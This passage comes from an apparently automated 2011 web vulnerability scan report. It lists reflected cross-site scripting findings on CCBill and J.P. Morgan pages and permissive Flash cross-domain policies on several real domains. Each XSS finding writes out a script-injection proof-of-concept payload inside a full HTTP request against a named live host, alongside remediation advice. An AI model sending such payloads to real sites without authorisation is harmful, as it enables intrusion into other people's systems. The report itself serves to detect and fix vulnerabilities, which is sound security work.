The value of the cookieLetterSize cookie is copied into an HTML comment. The payload a7caa--><script>alert(1)</script>e7b3059ecf4 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1ema7caa--><script>alert(1)</script>e7b3059ecf4; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1ema7caa--><script>alert(1)</script>e7b3059ecf4;">
...[SNIP]...

3.31. http://apps.ccbill.com/ [cookiePageWidth cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 430a3--><script>alert(1)</script>a94cfc1175f was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px430a3--><script>alert(1)</script>a94cfc1175f; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px430a3--><script>alert(1)</script>a94cfc1175f; font-size: 1em;">
...[SNIP]...

3.32. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookieLetterSize cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload e4d2a--><script>alert(1)</script>9c83aba8dd1 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1eme4d2a--><script>alert(1)</script>9c83aba8dd1; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1eme4d2a--><script>alert(1)</script>9c83aba8dd1;">
...[SNIP]...

3.33. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookiePageWidth cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 7d056--><script>alert(1)</script>975a7e1977 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px7d056--><script>alert(1)</script>975a7e1977; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px7d056--><script>alert(1)</script>975a7e1977; font-size: 1em;">
...[SNIP]...

3.34. http://apps.ccbill.com/p/developer.html [cookieLetterSize cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/p/developer.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload 87721--><script>alert(1)</script>11f81e5e53 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em87721--><script>alert(1)</script>11f81e5e53; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1em87721--><script>alert(1)</script>11f81e5e53;">
...[SNIP]...

3.35. http://apps.ccbill.com/p/developer.html [cookiePageWidth cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/p/developer.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload fc14d--><script>alert(1)</script>c14f5eaa013 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920pxfc14d--><script>alert(1)</script>c14f5eaa013; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920pxfc14d--><script>alert(1)</script>c14f5eaa013; font-size: 1em;">
...[SNIP]...

3.36. http://www.jpmorganaccess.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorganaccess.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db0"><script>alert(1)</script>671079c1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f0db0"><script>alert(1)</script>671079c1d94=1 HTTP/1.1
Host: www.jpmorganaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 257
Location: https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1">
...[SNIP]...

4. Flash cross-domain policy previous next
There are 18 instances of this issue:

http://1.gravatar.com/crossdomain.xml
http://at.amgdgt.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bh.contextweb.com/crossdomain.xml
http://idcs.interclick.com/crossdomain.xml
http://metrics.apple.com/crossdomain.xml
http://mtrcs.popcap.com/crossdomain.xml
http://pixel.mathtag.com/crossdomain.xml
http://s.gravatar.com/crossdomain.xml
http://stats.adobe.com/crossdomain.xml
http://www.burstnet.com/crossdomain.xml
http://www.gravatar.com/crossdomain.xml
http://www7.lowes.com/crossdomain.xml
http://blogs.adobe.com/crossdomain.xml
http://bstats.adbrite.com/crossdomain.xml
http://www.apple.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://stats.wordpress.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://1.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://1.gravatar.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:03 GMT
Expires: Tue, 12 Jul 2011 20:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://at.amgdgt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Wed, 13 Jul 2011 02:39:31 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.3. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.4. http://bh.contextweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.5. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:30 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.6. http://metrics.apple.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:12 GMT
Server: Omniture DC/2.0.0
xserver: www46
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.7. http://mtrcs.popcap.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mtrcs.popcap.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.8. http://pixel.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3b 6971
Set-Cookie: ts=1310503212; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:12 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.9. http://s.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:00 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://stats.adobe.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://stats.adobe.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www1
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://www.burstnet.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
